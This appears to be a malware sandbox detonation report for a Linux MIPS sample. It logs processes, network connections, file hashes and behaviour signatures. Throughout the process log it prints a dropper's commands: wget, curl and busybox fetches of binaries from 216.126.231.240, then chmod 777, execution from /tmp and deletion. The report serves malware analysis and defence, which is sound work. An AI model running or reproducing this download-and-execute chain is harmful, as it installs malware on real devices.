/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/chmod
[chmod 777 xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc
[./xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/bin/rm
[rm xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc]
/usr/bin/wget
[wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/chmod
[chmod 777 mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq
[./mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/bin/rm
[rm mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq]
/usr/bin/wget
[wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/chmod
[chmod 777 KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ
[./KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/bin/rm
[rm KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ]
/usr/bin/wget
[wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/chmod
[chmod 777 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e
[./1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/bin/rm
[rm 1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e]
/usr/bin/wget
[wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/chmod
[chmod 777 jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t
[./jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/bin/rm
[rm jO35p3ilukvfsE6y74InUUnbLJacTwrz8t]
/usr/bin/wget
[wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/chmod
[chmod 777 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5
[./6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/bin/rm
[rm 6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral4
Detonation Overview
Submitted
2024-11-21 08:15
Reported
2024-11-21 08:17
Platform
debian9-mipsel-20240418-en
Max time kernel
81s
Max time network
84s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | N/A |
| N/A | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | N/A |
| N/A | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | N/A |
| N/A | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | N/A |
| N/A | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | N/A |
| N/A | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | N/A |
| N/A | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | N/A |
| N/A | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | N/A |
| N/A | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | N/A |
| N/A | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | N/A |
| N/A | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | N/A |
| N/A | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | N/A |
| N/A | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | N/A |
| N/A | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | N/A |
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
| File opened for reading | /proc/sys/crypto/fips_enabled | /usr/bin/curl | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/1S3DYE9L1ODE3RDBCcxVKgq76XWx6Yvk2e | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/0wprA81cTZqq8CpDff9xycubkPkIuEDv1l | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6MQMF7EqS9sLqy6zsR7UO0YkcaRPIQE2S5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/TImbYyQErq2Pjn6pEs2iEgHDh0MmNCWusc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx | /usr/bin/curl | N/A |
| File opened for modification | /tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/mmdcnYxWN3tvXoIR2BatHzzo0otZaJsSqq | /usr/bin/curl | N/A |
| File opened for modification | /tmp/sEDxKCoYCUf9JtPYEXwXOwBqnxltIJst7X | /usr/bin/curl | N/A |
| File opened for modification | /tmp/yXRP32OWRCwzywQa2MrBL9WmerLEMYaLWv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jO35p3ilukvfsE6y74InUUnbLJacTwrz8t | /usr/bin/curl | N/A |
| File opened for modification | /tmp/xoCgctsJUTWBClJkUajOFJt7yhBQpkRvbc | /usr/bin/curl | N/A |
| File opened for modification | /tmp/KHnO9rsGvlEX1fxjIViURP5t9w4gbx5CHQ | /usr/bin/curl | N/A |
| File opened for modification | /tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB | /usr/bin/curl | N/A |
Processes
/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh
[/tmp/bd3d9ac7744fd61f9774e61affc8e0da073ab1100a7a5016a9cb78467ccd34fb.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/chmod
[chmod 777 aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/tmp/aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB
[./aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/bin/rm
[rm aGS2tp6AS7hd7fUZ5NnEk3odUSW1tQVXcB]
/usr/bin/wget
[wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/chmod
[chmod 777 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/tmp/6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx
[./6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/bin/rm
[rm 6uDi3BcojPUPGmit9uXpqjdT7A5tBapPJx]
/usr/bin/wget
[wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/chmod
[chmod 777 uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/tmp/uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo
[./uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/bin/rm
[rm uUYXFrJXG1Nx6dC8kmLRZi3DEF4a5S5sjo]
/usr/bin/wget
[wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/chmod
[chmod 777 d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/tmp/d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7
[./d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/bin/rm
[rm d9MyYHRJBDsVTQTawTz2IivYPfrft21ZI7]
/usr/bin/wget
